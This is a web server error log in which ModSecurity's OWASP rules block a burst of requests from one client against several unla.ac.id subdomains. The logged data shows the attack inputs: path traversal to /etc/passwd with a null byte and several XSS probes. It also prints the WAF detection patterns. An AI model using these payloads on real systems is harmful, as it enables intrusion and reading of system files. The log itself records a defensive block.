[Tue Aug 29 11:56:21.954038 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAArJXksAAAAZ"]
[Tue Aug 29 11:56:21.975812 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dcCo-f0AAAqeFn4AAAAx"]
[Tue Aug 29 11:56:22.014829 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArJXk4AAAAZ"]
[Tue Aug 29 11:56:22.622675 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAAq-HZwAAAAT"]
[Tue Aug 29 11:56:22.719499 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArC7kMAAAAW"]
[Tue Aug 29 11:56:22.916479 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAArJXlYAAAAZ"]
[Tue Aug 29 11:56:23.132795 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:section: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAArJXloAAAAZ"]
[Tue Aug 29 11:56:23.134255 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAArC7kgAAAAW"]
[Tue Aug 29 11:56:23.207331 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq5@QIAAAAK"]
[Tue Aug 29 11:56:23.225373 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArC7koAAAAW"]
[Tue Aug 29 11:56:23.236688 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq@skYAAAAM"]
[Tue Aug 29 11:56:23.527756 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArC7kwAAAAW"]
[Tue Aug 29 11:56:23.531345 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArLLckAAAAb"]
[Tue Aug 29 11:56:23.534399 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAAq5@QUAAAAK"]
[Tue Aug 29 11:56:23.579822 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16d8Co-f0AAAq-HaQAAAAT"]
[Tue Aug 29 11:56:23.625146 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArLLcwAAAAb"]
[Tue Aug 29 11:56:23.628472 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArKv1sAAAAa"]
[Tue Aug 29 11:56:23.629229 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArMmpUAAAAf"]
[Tue Aug 29 11:56:23.643986 2023] [:error] [pid 2765] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArNOgwAAAAg"]
[Tue Aug 29 11:56:23.664168 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArLLc4AAAAb"]
[Tue Aug 29 11:56:23.665755 2023] [:error] [pid 2765] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArNOg0AAAAg"]
[Tue Aug 29 11:56:23.674845 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAArMmpcAAAAf"]
[Tue Aug 29 11:56:24.724590 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArB10UAAAAV"]
[Tue Aug 29 11:56:24.775306 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArJXmoAAAAZ"]
[Tue Aug 29 11:56:24.779528 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIATsAAAAX"]
[Tue Aug 29 11:56:24.798863 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIATwAAAAX"]
[Tue Aug 29 11:56:24.874764 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIAT8AAAAX"]
[Tue Aug 29 11:56:25.578829 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArIAUEAAAAX"]
[Tue Aug 29 11:56:25.654996 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16ecCo-f0AAAq-HawAAAAT"]
[Tue Aug 29 11:56:25.693307 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAAq-Ha4AAAAT"]
[Tue Aug 29 11:56:25.731716 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArIAUgAAAAX"]
[Tue Aug 29 11:56:25.754966 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArLLeIAAAAb"]
[Tue Aug 29 11:56:26.965184 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16esCo-f0AAArKv2UAAAAa"]
[Tue Aug 29 11:56:26.999953 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16esCo-f0AAAqeFocAAAAx"]
[Tue Aug 29 11:56:27.034520 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAq-HbMAAAAT"]
[Tue Aug 29 11:56:27.123728 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArMmqEAAAAf"]
